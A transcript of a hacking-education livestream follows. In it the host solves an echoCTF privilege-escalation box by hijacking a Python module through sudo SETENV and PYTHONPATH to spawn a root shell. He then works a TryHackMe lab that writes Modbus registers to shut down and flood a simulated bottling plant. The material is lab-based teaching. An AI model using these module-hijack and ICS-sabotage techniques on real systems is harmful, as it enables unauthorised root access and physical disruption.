Okay, so now that we've got initial access to the box, what we need to do now is we need to do privilege escalation, and privilege escalation is basically going from a low-level user, which is the ETSCTF user that we're running as right now, to the root user. So before we do that, we're going to upgrade our shell a little bit because the default netcat shell is not super functional. Typically what we do is we look for some version of Python that we can use to upgrade our shell slightly with the Python module. So we'll run Python 3, and we'll run import pty to create a sudo terminal. pty.spawn bin bash, and now we've got a slightly more responsive terminal. We've got a prompt. That is good. And what we want to do is we want to figure out if we have any special privileges on the system. So typically low-level users should not have special privileges on the system, but we can check for them using this command right over here. It's called sudo l. So list out your sudo commands. So it says here that users ETSCTF may run the following commands on Explorer. So all, so they can run as any user and any group, and they can run setenv, which is set up the environment variables with no password. They can run this binary right here. So the binary is called slow generator, and if you don't know what a binary is, what the program is, you can do a little bit of research. So we could ask this question: what is slow generator? Okay, slow generator is a Google Cloud tool. Is this what we're looking for? We also have a GitHub repository from Google called Slow Generator. And GitHub repositories are a really great place to do research about potential tools to use for privilege escalation. And what does it say? So Slow Generator is a tool to compute and export service level objectives, or SLOs, error budgets and burn rates using configurations written in YAML or JSON format. So what we need to understand in this case is that this tool is it's a Python. It was written using Python. We can see here in the GitHub repository that Python makes up 97% of the files in here. And if we've got a Python tool that we can run as sudo, and we also have set env capabilities with this particular Python tool, we can use it to do some abuse. Let's talk about how we would do that. Okay, so we're talking about privilege escalation with the Python set env. So on this system, we were able to run a Python tool called Slow Generator with the set env capability. So if you have the set env capability with the Python tool, we can modify the directory that the tool imports modules from. So this is part of the set env capability, and we can provide spoofed modules with malicious code for the tool to run. So usually in Python, the directory that it's going to import modules from is going to be a standard one. But in this case, because we have set env, we can specify which directory to import the modules from. And so the next step is to figure out which modules are imported by the Slow Generator tool. So if we go over to the GitHub repository, let's see, where is it? So this is the list of files right here. So we can go over to Slow Generator and then enter that directory. There are a number of Python files. So for example, we could click on any one of these, for example, CLI.py, and we can take a look and see which modules this particular Python file is importing. So it really doesn't matter too much which one of these we use for abuse, but in this case, we probably want to use one that's kind of not super common. In this case, we've got this click module. So what we can do is we can create a Python module. It's just a Python script. It's going to be called click.py, and we're going to put some malicious code in there so that we can do privilege escalation. So because we know that this CLI.py is part of the Slow Generator tool, when we run the tool, it's going to import all of these modules. And if we put some malicious code inside of click.py, it'll run that as well. So let's go ahead and write a little malicious file. So we're just going to go over here. I'm going to shut down the HTTP server for just a second, and we're going to create a malicious click.py file. So in here, let me get the code we're supposed to use. I'm going to put in some malicious code that's going to get us privilege escalation. So inside of the Python file, we're going to import some other modules as well. Import OS, import sys, and we're going to print out a little message. So the message is going to be hijacked click module. This is going to be our message that lets us know that we've actually hijacked the module and are running some malicious commands. So we're also going to run os.setUID0, and that's going to set the user that we're running as to the root user. We're also going to run os.setGID, which sets our group to the root user as well. And then we're going to open up a shell. It's going to be os.system bin bash, which is your standard Linux shell with -p to preserve your permissions. So it's going to use these permissions right here, which is roots. I'm going to save out this file, and then we're going to upload this to the target. So we're going to generate the command. What is our IP address again? So we're going to wget http 10.10.3.10 click.py. We're just going to upload this to the target from our attacker machine. Copy the command, and then we're going to start up our Python server again. Okay, go back to the vulnerable machine, paste in the command to, well, we're going to move into the temp directory first. So what we're going to do is we're going to stash this click.py file in the temporary directory here, because we can write to it. Paste in the command to download the click.py file, and then we can run our slow generator command. Comrade Soul, hello, nice to see you here. What is up? So we downloaded the file. We can, confirm that click.py has our malicious commands in here. And then we can run the slow generator command that incorporates this click.py file to get privilege escalation and become the root user. So the command is this. So sudo python path. So this is part of the set env capability. Python path equals temp, which means it'll import modules from the temp directory. We run user local bin slow generator -- help. So we're just going to run the command, but we're not going to really do anything with it. We're just going to pull up the help. But so when the program starts, it'll import all of the modules that were mentioned on the GitHub site, including the click.py file that we told it to look in the temporary directory for. So when we run this, it says hijacked click module, and then we get a prompt here as the root user. So if we ask who am I, we are root, which means we can do this.
What are you? I'm system root.
Okay, so we're now the root user. So we can finish the exercise. Typically, how you finish any one of these network CTF exercises is you move into the root directory as the root user, and then you read the flag over here. So there are two flags that we need to access in order to finish the challenge. There's one in the root directory, and there's another one in the home ETS CTF user directory over here. So these are the two flags, and basically we're finished the challenge because we're the root user. All right, so let's talk about this challenge over here. So this was the Explorer challenge from the BR CTF Machines Network over at EchoCTF.red. If you enjoyed this guided walkthrough, please click on the like and subscribe buttons on the video and leave a comment underneath the video. But until next time, HackerFrogs out. Okay, so we've got some extra time. We might start the next part of the stream early because I'm not too sure how much time it's going to take for us to do the module over here. So the module is called Attacking ICS. So this is talking about attacking industrial control systems. Stuff like what is it? Power plants or like electric plants and stuff like that. And yeah, so we're going to be interacting with it using like a specialized Python module. But otherwise, I don't think we have the capability to shut down the target, unfortunately. But before we move on, let me do a little bit of cleanup. So I think we stashed our files in the uploads directory. No, it was directly here. So webshell.php. Let me just delete those files. So webshell.php and rev.elf. Let's get rid of both of those. And we left another file inside of the temp directory. Let's just get rid of that too. Okay, and then we get out of here. All right, so let me go ahead and stop the clock, and we'll move on to the next part of the stream. So topic 2 is done, topic 3 is here, topic 4 is on deck. Let me close out some of these windows that I'm not using. So if you're wondering what we're going to be doing after this, we're going to be doing the TryHackMe Advent of Cyber side quest room. It's called the Great Disappearing Act, and we're still working on it. But first, we're going to be doing this module over here called Attacking ICS Plant number 1. Okay, let's go ahead and start that. So what you want to do after you've joined the room is, well, complete task number 1, and we'll talk a little bit about what ICS is, because they've got a lot of great material here for us to read about. But before that, I think what I want to do is I want to start up my TryHackMe VPN access. So I think we're using US East, this one. Okay, so we got that running now, and let's talk about what's going on here. So attacking ICS Plant number 1, learn to discover and attack ICS plants using the Modbus protocol, which is Modicon Schneider Electric. So operational technology, OT, refers to systems used to monitor and control industrial operations. Industrial control systems, otherwise known as ICS, include systems to monitor and control industrial processes. If IT operators have dozens of years of experience securing networks, systems, and applications, OT operators are pretty new to this topic. So the problem is that most industrial controls are not really made with security in mind, although I guess that might be changing these days. So supervisory control and data acquisition, SCADA systems, are used to control and automate industrial processes. SCADA systems include supervisory computers. So the servers used to manage the process, gathering data on the process and communicating with filed devices. These are PLCs and RTUs in small deployments. HMI is embedded in a single computer. In larger deployments, HMI is installed on a dedicated computer. We got our programmable logic controllers, or PLCs. Digital computers used mainly for automating industrial processes. They're used to continuously monitor sensors, which is the input, and then make decisions on controlling devices for output. We got RTUs, or remote terminal units. So RTUs and PLCs functionalities overlap with each other. RTUs are generally preferred for wider geographical telemetry, while PLCs are better with local controls. We got our communication network, the network connecting all SCADA components, for example, Ethernet, serial telephones, radio, or cellular. Network failures do not necessarily impact negatively on the plant process. Both RTUs and PLCs should be designed to operate autonomously using the last instruction given for the supervisory system. We also have HMIs, or human machine interfaces. It displays a digitized representation of the plant. Operators can interact with the plant, issuing commands using mouse, keyboard, or touchscreens. Operators can make supervisory decisions, adjusting or overriding the normal plant behavior. So in short and simple words, industries are managed by sophisticated mission-critical computers. These are called SCADA systems. Security is not the first priority in OT and ICS. Operators can manually override the behavior of the plant via mouse, keyboard, touchscreen, locally or remotely, and malicious software can override the behavior of the plant like HMI does. Okay, so let's go ahead and move on to the next thing. So we're talking about the Modbus protocol. Modbus is an industrial protocol developed by Modicon, acquired by Schneider Electric. Modbus is widely used to connect industrial devices. Protocol specification is available and royalty-free. Modbus protocol is a master-slave protocol. The master reads and writes slave registers. Modbus RTU is usually used via RS-485 serial network. One master is present with one or more slaves. Each slave has a unique 8-bit address. Modbus data is used to read and write registers, which are 16 bits long. And the most common register is called the holding register, which is readable and writable. Registry type input register is readable only. The register's coil and discrete input are 1 byte long, or 1 bit long rather. Coils are readable and writable. Discrete inputs are readable only. So we got Modbus register types. We got discrete input, status input 1 bit, RO, read only. We got our coils, which are discrete output, 1 bit read and write. Input registers, which are 16-bit and read only. And we got holding registers, which are 16-bit and are read and write. So we got some registers which are read only, and some registers that are read and write. Okay, so we have a number of different function codes. So the function codes are going to be the same across the entire system. So, code 1 is read coil, code 2 is read discrete input, code 3 is read holding registers, code 4 is read input registers, code 5 write single coil, code 6 write single holding register, code 15 write multiple coils, or code 16 write multiple holding registers. Okay. So before starting, download the attached script package and install the Modbus TCP library for Python with the following command. So pip3 install modbus = 152. So we can probably simulate this by creating a virtual Python environment, which is something most of the time when you're only going to be using a module once, you don't necessarily want to install it to your collection of Python packages. Let's go ahead and do that somewhere over here. We're not going to be using this for a little while. So I'm just going to make this my Python virtual environment. Let me set that up. So I'm going to run Python -mvenv, my-env. We're just going to call the virtual environment my-env. Virtual environment my-env to activate, well, to set up the environment. And then we're going to activate the environment with this command. Okay, and now we've got our Python virtual environment here. We know that we're in a virtual environment because we got the name of the virtual environment in the prompt over here. Good, good, good. And then we can start doing some import. Well, we can start what is the word? Installing some Python modules. We've got some ads running on Twitch right now, so we're just gonna put on the birds while I take a little water break. How about we put on our lovely Red Robin? We'll be back in about 50 seconds after I take my water break. Enjoy the music and the birds. Cedric, hello, nice to see you here. We're just taking a little water break right now because we've got ads running on Twitch. But let's put the birds away and let's get back to the hacking. We're hacking some industrial control stuff. Okay, so before we get started, we need to download the Python module, which has the script we're going to be using to interact with the industrial controls. So let's see, pip install modbus 1.5.2. Let's run that command. Okay, so we should have the Modbus module available to us now. We can confirm just by going into Python and then doing import Modbus, pymodbus. Okay, so we were able to import it, which means we've got the thing installed. That's great. Okay, let's go back to Which is the function used to read the holding registers in the Modbus library? Read holding registers. Let's see, holding registers. They don't. So it looks like we need to do a little bit of. Which function is used to read holding registers in the Modbus library? So I'm going to assume it's something like read holding registers. I guess we could go in here, we could do a little bit of research. Python, Modbus, functions. We'll probably get the official documentation here. Modbus function codes. So let's start looking for reading functions. Okay, we got... It's probably not enumerate because we're looking for like a really long answer here. So we got a function for reading holding registers, and there's a function for writing holding registers. I mean, the way we look this up these days, oh, okay, so we've got like read holding registers, complete guide with examples. Let's open it up in GitHub. Document not found, region register. Okay, so we could just, this is a good task for the AI. We can just go over to the AI. Actually, let's try perplexity.ai, and we'll just ask this directly. So let's see, Modbus read holding registers function. And let's see, read holding registers is a Modbus client method which uses Modbus function code 3 to read one or more holding registers with the Modbus device. So it looks like is it Modbus TCP client? 3D Code Warrior, hello, nice to see you here, and I'm a 640. Thank you very much for coming by. Thank you. Okay, so if you share your Modbus version and whether you use TCP or RTU, a specific version snippet. So let's see, binary payload decoder from registers. Read holding registers. So it's probably this. It's like a method. Let's go back. So it's read holding registers. Okay, that was it. Good. And which is the function used to write holding registers in the Modbus library? It's probably going to be the same thing, well, the same format. So write. Maybe just write registers. Register, write register. Okay, so read holding registers and write register. This is what we use. Got the next thing, discovery. There was like a task file in here, but it didn't ask us to download it, strangely enough. Let me see what the actual task file here is. Oh, there's a script. So there's a compressed script. It's probably going to ask us to use it a little bit later. So task 3, discovery. Okay, connect to the plant using the browser and learn how the bottle filling plant works. So we're just going to start the virtual machine associated with this. And it's probably going to take about a minute for the virtual machine to start. Just going to wait a little bit. We have 3 phases. We got initialization. The plant is starting from the beginning. The roller moves the first bottle under the nozzle. To phase 2, filling. Once a bottle is under the nozzle opens and the water flows into the bottle. Phase 3, moving. Once the bottle is filled, the roller starts again, moving the next empty bottle under the nozzle. When phase 3 ends, the plant starts again with phase number 2. So from the 3 phases described above, we can observe sensors are used to read the state of the plant, and actuators are used to alter the state of the plant. So for example, a sensor can detect if a bottle is under the nozzle, while an actuator can open or close the nozzle. Okay? Mind that we can press the escape button to start the plant from the beginning. Virtual plant can be downloaded from GitHub. So it looks like we've got an open GitHub project over here. If you ever wanted to practice your ICS skills using this simulation here. This repository was archived by the owner and is read-only now. Okay. So I guess this is what we're going to be using to, well, this is what we're going to be attacking, I guess. Okay, so how many phases can we observe? So there are 3, well, I mean, they talked about 3 phases, right? Initialization, filling, and moving. Okay, so we also have, so the machine is initialized now, so we're just going to access it from over here in our web browser. Oh. Okay, seems to not be working. Let me just copy it directly. Okay, so we got, oh, the virtual, the bottle filling factory. Okay, so we see the bottles being filled up after they move to the nozzle, or they move underneath the nozzle. So they fill up. And Thanto, hello, nice to see you here. Back, Mr. Frog. Thank you. Thank you for coming by. So I guess, do we get to move this dot? The dot doesn't move. So this is the visual representation of what's happening here. So we got the red dot and the green dot. Are they supposed to represent different things? But anyways, let's go back to the TryHackMe room. So if you're wondering, Thanto, we're doing this room right over here, called Attacking ICS 1. Okay, so we saw 2, it's either 2 or 3 phases. I don't know if we actually got to see the initialization phase. We do see the filling phase, and then we do see the moving phase where the bottles are moved off. Dante says, last night I was playing Advent of Cyber, oh, for 2024. Yeah, hope you're having a lot of fun. Okay, so let's say 3 phases, right? Yeah, okay, 3 phases. How many sensors can we observe? So I'm guessing that this is a sensor here to sense that the bottle is in the right position. So maybe there are 2 sensors here. Okay, let's try it out. So sensors, 2 sensors. Okay, and how many actuators can we observe? So the actuator is the thing that controls the machinery, and I think there's only 1 actuator here that turns on the nozzle and fills up the bottle with water. So it's 1 actuator. No? What's the hint? So include the button to stop and start the plant. Review again the definition of actuators. So let's take a look at what the actuators are. Actuator. Very fun, got rickrolled. Awesome, awesome. So these are registers over here. They don't talk about actuators. Let's go back to number 3. So actuators used to alter the state of the plant. Okay, so a sensor can detect if a bottle is under the nozzle, while an actuator can open and close the nozzle. So how many actuators can we observe? So we're taking a look at this. So actuators are things that do something. So there's an actuator that fills up the bottles. And there's another actuator that moves the bottles down the assembly line. So I guess the answer is 2. 2. No? Still. So there's an actuator that opens the nozzle. Maybe there's a separate actuator that closes the nozzle. So that's 1 and 2. And there's 3. Stop, start the nozzle and the line. So that's 3. Tatted 1. Hello, nice to see you here. Let's try 3 then. Okay, check that. Okay, that's the actual answer. And Manvitha, hello, nice to see you here. 4, I think. Well, I mean, looks like they were looking for 3, yeah. So using the script discovery.py, how many registers can we count? Okay, using the script discovery.py, we downloaded the script, so we need to deploy it now. Okay, let's get out of here. Exit. Then we'll move into the downloads. Actually, wait. We'll move the script into this directory. Move downloads. What was the name of that file that we downloaded? It was called scripts. Move it in here, and then we need to unzip this thing. So it's a GZ file first. Saharan says, which team do you like being on for pen testing? I mean, I've only ever done the offensive pen testing. So I guess it would be either offensive pen testing or red teaming. Of course, some people think that red teaming has a very specific offensive security is the team that I was on. Okay, let's g-unzip this script. And is it still tarred? Okay, so we need to tar XVF, this thing. We got 3. So attack, move, fill. Attack, shutdown. Attack, stop, fill. Then we've got their discovery script over here. So do we just run the thing? Gannet AK, hello, nice to see you here. What is that emote? Is that a dancing gummy bear? Bop bop. That's a fun looking emote. Soul asks, if I want to become a pen tester, do I need to focus on one platform? Or should I use multiple platforms like PicoCTF and RootMe? I mean, never marry yourself to one platform. By platform, we're talking about like training platforms or educational platforms. I use a lot of different platforms, and the different platforms give you different things, especially if you want to use only the free parts of each one of these websites. You want to move around a lot. Each one of the websites is going to have different strengths and weaknesses, but definitely use a bunch of different platforms. Manvita says, I'm pursuing a CSE with cybersecurity. CSE, can you tell me what CSE stands for? Okay, finding your content interesting, hoping to learn more. Yeah, I mean, if you have any questions, definitely ask. Unfortunately, I don't know what all of the acronyms are. If there are acronyms that I don't know about, I'll ask. So what is a CSE? So is it like computer science engineer or something, or let me know. Okay, so I think we want to run the discovery.py script. So we just run Python discovery.py and no module named 6. No module named 6. So from 6 import string types. So I wonder why we can't run this. Let's go into the script really quick to see if we can discover something. So import time from PyModbus, import this stuff. Okay, so IP is system arg1. So Modbus client IP port 502. So what we need to do is we just need to include the IP address with the system arguments, or sorry, the script arguments. So just run discovery.py with the IP address. So the IP address is here. Paste it in. It still says no module named 6. It's looking for this stuff over here. Manvita says computer science. Oh, computer science engineering. Okay, okay. Pip install 6, Tiago, maybe. Use Python 3. I mean, Python is Python 3 by default on Kali Linux. So if we do Python -- version, it says 3.1. I mean, I can give it a try. I don't... Yeah, no module named 6. So it's looking for packages PyModbus client sync, and it's looking for utilities.py as well. Clara says Python 3. Let me see if this... Let me see if this exists on my... I don't think... Yeah, we don't have our libraries in here. So maybe I need to specify like a specific directory for those libraries. So the first thing I want to see is I want to see if this file path exists. Let's just look for Python 3.1. I mean, it's not going to be Python 3.1.3. Oh, it is. Okay. So we're looking for site packages, PyModbus, utilities, break system packages. Yeah. Clara says hi and good night at the same time. Free good, paid bad. Free good, paid bad. Well, I mean, I recommend free stuff because not everybody has a lot of money. If you find better results from paying for stuff, then you're welcome to it. Okay, so when we try to run the script, versus Kitso-Frenic. Hello, nice to see you here. Free as me? Well, we like to hope so. I like to hope if we can get some good stuff for free. So, So if it's looking for... So do we do what we did last time and we specify like a directory? But we don't have... if we specified like a directory to import modules from, then the PyModbus wouldn't work anyways. So is it update... is the version updated? So the version... They tell us to use... How old is this room? So they said that we should be using like PyModbus version 1.5.2. So download the attached script package and install the PyModbus TCP library for Python with the following command. I did pip, but I'm pretty sure that the regular pip on Kali Linux is also like is also pip 3. But just in case, I'll try, yeah. So requirement already satisfied. PyModbus needs 6. I mean, pip install 6. Installed package 6, and then what else were they looking for? So no module name 6, and we'll try running it one more time. Hopefully it works. Okay, so it works now. We just need to install an extra thing. I don't know what the 6th module is, but apparently well, we needed it. Okay, so how do we parse this this output here? So they're asking us to answer some questions. So use the script discovery.py. How many registers can we count? So I think each one of these items here is a register. So 2, 4, 6, 8, 10, 12, 14, 16. So there's 16 registers here. Tiago solved it. Thank you. Thank you very much, Tiago. Okay, so after the plant is started and the bottle is loaded, how many registers are continuously changing their values? After the plant is started and the bottle is loaded, how many registers are continually changing their values? So let's take a look. So we see here that this one changes, so that's 1, 2, 3, 4. So 4 of the registers are changing values, and the rest of the registers are staying the same. What is 6 anyways? That's a good question. So the name is actually a math joke. 2 times 3 is created when the world is moving from Python 2 to Python 3. Since the 2 versions are quite different, developers used the 6 library to write code that can run on both versions without crashing. That's some meta humor right there. So Suf says, I want to ask you something. I'm a student and I have been learning C and C+, and a little bit of Python. Now I spend about 8 hours a day learning pen testing stuff. Okay, there are many topics to learn. Okay, and I'm assuming that the question comes later. How can I learn all these topics? Should I focus on one topic until I finish it and then move on to another one? So let's see. Suf says, I have only 3 months. I need to search for an internship. Can you tell me what is the best thing I can do? Also, do I need to learn back-end development? I can spend more than 14 hours a day. So I mean, I'm pretty sure if you want to do pen testing, you don't necessarily need to learn back-end development. I mean, it might help to understand systems if you learn back-end development. You don't necessarily need to learn that stuff to do pen testing. And Frex Red, hello, nice to see you here. And how do I learn all these topics? You learn them one at a time, and you take good notes. So whenever you do one of your pen testing topics, you definitely want to record how you finished it and do a little write-up. So in the real world, you're gonna be doing a lot of write-ups. You need to explain exactly how you finished exercises or how you accomplished certain tasks, because you're gonna be showing them to clients eventually. So, for example, if I'm doing my Portswigger Labs over here for authentication, and I'm going through the exercises, I want to record exactly how I finished each one of these. So the important thing to know is that you need to take careful notes and record everything that you do. Okay, Nastro Arc says, I did learn backend and I would have been okay if I didn't learn it. Well, I mean, learning backend makes you a developer, and the developer role and the pen tester role they're different. I mean, sometimes knowing about the developer role helps you in pen testing, but you definitely don't need to dive too deep into it. Okay, so let's keep on going. So the next question is, after the plant is started and the bottle is loaded, how many registers are continuously changing the values? So we found that there were 4 different registers that were changing. What is the minimum observed value? The minimum observed value? Well, I mean, we saw zeros, so it doesn't get much lower than 0. And what is the maximum observed value? So the only other value we saw was 1. Okay, Saharan PRG says, if you didn't learn backend, you're not going to be able to even get a request. I mean, you don't need to learn backend to learn what GET requests are. I mean, you don't need to be a developer to know what HTTP GET requests are. Is there something I'm missing? Thank you very much for following on Twitch, Gank and Grind. Thank you. Okay, which registry is holding its value? Which registry is holding its value? And which registries are set to 1? Which registry is holding its value? Are we referring to the registries by the number? I guess we are. So I'm guessing that register number 16 is the one holding its value in this case. So register, do we start counting from 0 or 1 in this case? I'm not even sure. Well, I'm sure we can figure it out. Thank you very much, Eris, for subscribing on YouTube. So 16 is holding the value. Which registry is set to 1 while the nozzle is filling a bottle? So let's see. Cypher says, if you know development, it can really help you with automation. That's true. That's true. I'm not saying that learning development is a bad thing. It's just that you don't need to know a lot about development to be successful in pen testing. You need to know a little bit about. You need to know enough to understand how the applications work. You don't necessarily need to be a person with like a lot of development experience. So which registries are set to 1 while the nozzle is filling the bottle? So I think which registries are set to 1 while the nozzle is filling the bottle? Let's take a look at the discovery here. Set to 1. I only see one registry, or one register. While the bottle is filling the... let's take a look. Which registries are set to 1 while the nozzle is filling the bottle? Do they want us to put in, like, multiple? Okay, so everything is set to... So it's the first register and the third register, it looks like, that are set to 1. So 1 and 3? So 1, 3. No. Okay, so 1 and 2. Ted and 1 says 1 and 2. Let me take a look. So set to 1. 1 and 2. I mean, if we're going in order, so this is register 1 and this is register 16. So it looks like it's either 1 and 3 or 2 and 4. Yeah, maybe it's 2 and 4. So 2, 4. Okay. So Saharan says, it took me less than 2 weeks to learn JS. Okay, and after that I headed up to Bun.js, but CCOR/CPP, much more different than web pen testing. So 1 and 3 is for moving. Let's see. So when registers are set to 1, which registries are set to 1 when the roller is moving the bottle? So I think we're taking a look at the other set, which is 1 and 3. And what is the color of the water level sensor? So the water level sensor, if we take a look at the... Oh, okay. So this keeps track to see that the water isn't going above this certain level, so it's the red one. Thanto says, gentle princess. What are we talking about? Saren says, PHP will get you a job. Well, I mean, there are no, what is the word? There are no real dead languages, but there are languages that are more likely to get you a job, for sure. Let's go back. So this is red. So Sue says end projects are coded using C and C++. Understanding how web servers work. How can understanding how web servers work help to find an internship? I have similar projects that I created using C and C++, such as a mini shell and a web server. I mean, let's see. So Tatted One, I agree. This is a pretty cool room. People don't talk about industrial control systems very much, but in the case that we have countries going to war and trying to mess each other's infrastructure up, this is the type of thing that's going to get hacked. So they're going to attack industrial control servers and try to do some really bad things to people's power grids and such. Some Stuxnet level stuff. I don't know if they use this in Stuxnet, but yeah, something kind of similar. What is the color of the bottle sensor? That was green, right? Okay, if you observe the plant at the very beginning, which is the registry associated with the roller? Which is the registry associated with the roller? So we know that the roller is moving the bottles in either registry 1 or registry 3. It's probably registry 1. No? Is it 3? Okay, it was 3. So based on the previous answer, which is the registry associated with the water level sensor? That's probably... So the roller is probably number... So, okay. So the roller isn't in operation when the water level sensor is in operation. Or, yeah. Because the water level sensor is only going to be working when the roller is switched off. So it's probably going to be number 4. No, it's not number 4. So if the roller is number 3, then... So 1 and 3, 2 and 4, maybe 2? Okay, let's take the hint. So the hint says, the roller is moving only when the bottle is filled. Oh, so the sensor is on when the roller is moving? So that's going to be sensor 1? Okay, so we got next task, play to learn. So in the previous task, we learned a lot about registries. The bottle filling plant exposes 16 registries, but only 5 are used. Registry 16 is associated with the stop-start button. 1 means the plant is on, and 0 means the plant is off. Okay. Registries 1 and 4 usually have the same value, except in the initialization phase. Registries 2 and 4 always have the same value. So 1 and 3 usually have the same value. 2 and 4 always have the same value. So we observed 3 phases, and the associated registries are initialization, which means that everything is off except for one of these and the on button. So filling, once a bottle is under the nozzle opens and the water flows into the bottle. Okay, Saharan says you will need a really solid background nowadays in order to get an internship. You should have started yesterday. I mean, that's kind of like investment advice. The best time to invest your money was yesterday. Okay, so once the bottle is filled, this roller starts again, moving the next empty bottle under the nozzle. So we assume that the plant has 2 sensors and 3 actuators. So the actuators are the start and stop button, which is registry 16, the roller engine, which is registry 3, and the nozzle, which is registry 2 or 4. We need to spend additional time on that. We also have our sensors, which is the water level, which is register 1, the red sensor, and the bottle position, which is either 2 or 4, which is the green sensor. We need to figure it out. So play with the setRegistry.py script and figure out which registries are associated with the nozzle. Which one is associated with the nozzle? Okay, so setRegistry.py, let's go and do that. So we just run set registry.py instead of discovery. Index out of range. Okay, so we need to supply like a second argument. Let's go into the script real fast to figure out what's going on. Okay, so IP is going to be the first argument, the registry is going to be the second argument, then a value is going to be the third argument. So we got registries from 1 to 16. The value is either going to be 0 or 1. Okay, so we'll run set registry on, I think it's register 2 or 4, right? So bottle position 2 or 4. Which registry is associated with the nozzle? So the bottle position and the nozzle are both going to be either 2 or 4. We're going to set, let's try setting 2. To on. Okay, so if we set 2 to on, and then we can take a look at what's going on in here. It fills up. I don't see a difference. Should I reload? Let's set the thing to 0 instead. So we'll set the second registry to 0. And we'll go back to see, oh, okay. So the nozzle is register 2 because something's going wrong with it now. Okay, so we figured it out. So it's registry 2 that controls the nozzle. That's 2. What? Bottle position. Nozzle is registry 2 or 4. Wouldn't 1 be the nozzle? But what one? Okay, so we set number 2. We set number 2 to 0, and then something went wrong. Let's go back. So we set this to 0. And Super Siraj, hello, nice to see you here. So it's either 2 or 4. Wouldn't 1 be the nozzle? Okay, hold on, let's go back. So red registry is associated with the nozzle. So water position, it says here that the nozzle is registry 2 or 4. Let's try setting nozzle 4 to 0. And see what happens. Okay, the nozzle stopped. So this is definitely going to be register 4. Okay, so how do we reset everything? I was thinking about the water level going over due to number 1. Yeah, I'm not too sure what exactly happened in that case, but I think we did confirm that that register 4 is the nozzle. Xmetric says, "Yay! Supply chain attacks for the win." Super Siraj says, "I want to learn cybersecurity. Can I get a guide?" Yeah, let me know what your current level of technical expertise is, and maybe I can give you some advice. What do you already know? Siraj, let me know. Okay, so this is it. So we just need to do the final thing, which is attack. Oh, I forgot to put on my... I forgot to set my time limit. Okay, I've got like 35 minutes left to do this. I don't think we're going to need 35 minutes to just complete this last thing. Okay, so in the previous task, we figured out how the registries works. Register 1 is the bottle sensor. Value is 1 if there's a bottle under the nozzle. Registry 2 is the water sensor value. Value is 1 if the bottle is filled. Registry 3 is the roll actuators. Value is 1. It turns the roller on. Xmaker says, I already know how to flash backdoors in Network interface cards. Where do I start my hacking journey now? Well, I mean, I think what you need to do is you need to figure out what exactly you want to, what role you want to do, and then that'll decide what education you want to get next. Okay, so let's see. Registry 4 is associated with the nozzle. Value 1 opens the nozzle, and Registry 16 is associated with the plant. Value 1 starts the plant. We can abuse the registries by forcing a custom value to above registries. We can do that in many ways. Mind that the plant manager will shut down the plant if an abnormal condition is detected. Okay. Shut down the plant and avoid... What does this say? Shut down the plant and avoid the plant manager starting it up again? Okay, shut down the plant and avoid the plant manager starting it again. So let's go and take a look at our scripts. So we got a few different scripts over here. I guess we've got one called attack shutdown, and we want to shut down the plant, right? So I'm assuming that if we just run Python attack shutdown, it should work. Oh, we need to add .py onto the end of this. .py. Okay, and let's take a look at the... So the bottle filling plant is not moving. So 16 turns it from 0 to 1. 16 turns it from 0 to 1. It'll detect it. So nothing's happening. We need to press escape to restart. So it is off. So we can manually set it back to on as well, I'm pretty sure. Okay, so we need to continuously run the script to keep it off. And Salman Abdi, hello, nice to see you here. What is up? And the code guy says, hey, the code guy, what is up with you? So it looks like the plant is off. We can restart the plant by running set registry 16 to 1. Okay, so now the plant is moving again. And it's operating as normal. Okay, and let's continue. So shut down the plant and avoid the plant manager starting it up again. So I think the plant will restart if we just use the set registries. So if we set registries to 0, it'll temporarily turn off the plant, but it'll start up again in a minute. So let's run this. So this will shut down the plant. So the plant shuts down. The code guy says, can you hack a girl's heart for me? I don't think I can do that remotely. And I don't think it's super ethical. Oh, I don't know if that's super ethical in the first place. But Xmetric can, apparently. And Shakira, hello, nice to see you here. 3 easy payments. Study social engineering. Maybe that's the way to do it. Okay, so, I mean, this stopped. What else do they want us to do? And Chernobyl guy, hello, nice to see you here. What is up? Okay, start the plant, open the nozzle while the models are moving. Open the nozzle while the bottles are moving. Okay, so start the plant. We can do that. So we'll just give 16, registry 16 equals 1, and then registry 4 equals 1. Where is it? Here? Okay, and then give it again. It was 4, right? Chernobyl guy says, I want to learn how to hack. Yeah, I mean, depending on how much experience you have, you might benefit from the starter pack here. Shirai says, I want a direct guide. Direct guide. I mean, I don't do mentoring. If you have specific questions, you can ask them in chat. I don't tend to mentor people, especially if you have a lot of questions while I'm offline. So attack, move, fill. So I think we're going to be using, let's see, attack, move, fill. We'll try this one. Run it, and what happens here? Okay, so we see the nozzle doesn't stop, which means the water gets to spill all over the place. Okay, Code Guy says, this attacks are simulation. There's supposed to be simulations of what you could do in the real world, especially for, yeah, industrial control systems like this, well, bottle filling factory over here. It's just a simulation, of course. Check the binary to see that what we changed. Yeah, so we can, we just need to read the script, right? So cat attack move fill. Okay, so while this is just a while loop. So yeah, so while true, write register to start the roller, and then open the nozzle, and then start the plant. So all of these things are, well, they're never going to, they're just going to run continuously. Okay, so try super, social media. Yeah, I mean, if you want to join the Discord server, we've got a Discord server here. We also have like a Reddit. Mr. Gray says, TryHackMe and Hack the Box are great if you want to learn. Burp Suite has a good is a good learning platform as well. Yeah, especially if you want to learn like web app hacking stuff. Let's see. I think it's called. So it's Portswigger. Portswigger Web Security. Okay, so Sharon Mobile Guy says, where can I learn to code and hack? Shirar says, I'm from Nepal, so we're going to learn about cybersecurity. I gave you the starter pack. Let me put it in the chat again. There's a few different YouTube playlists over there. Go and look at them all, take some good notes, and those playlists will give you a good foundation for learning about technical hacking. Let me pull up my music. How about this stuff? Okay, Akil asks, how much does the CTF Mindship actually differ from data-domain malware research? Are you I mean, you're assuming that malware research is the job, right? Because that's not necessarily the case. So we're talking about cybersecurity specializations. Not everybody works in the same job. So you're talking about malware research. That's just like one role you might do in cybersecurity. You could also do like pen testing. You could do red teaming. You could do digital forensics analyst stuff. You could do incident response. The code guy says, do you do a job or are you full-time streaming? So I do education stuff online, and I'm also starting a nonprofit company that's looking into teaching people about cybersecurity and like awareness programs. So how is your chat not delayed? How is my chat not delayed? Is it supposed to be delayed? You can set the amount of delay. So Akil so you says, how much does the CTF mindset actually differ from data-domain malware research? the stuff that you do day to day, I mean, for example, if you're doing something like pen testing, how are CTF exercises different from IRL? So let's just assume we're talking about pen testing. So CTFs have definite end goals. IRL does not have a definite end goal as far as like a vulnerability being there. There isn't always a vuln IRL, but there is definitely a vuln in the CTF. Okay, Sarah says, does the URL in live for Discord genuine? You want to guide directly with message. I'm not too sure what you mean there, Siraj. Okay, so let's go back to the room. So start the plant, open the nozzle, and stop the roller. Start the plant, open the nozzle, and stop the roller. So I guess we're talking about the second script, the 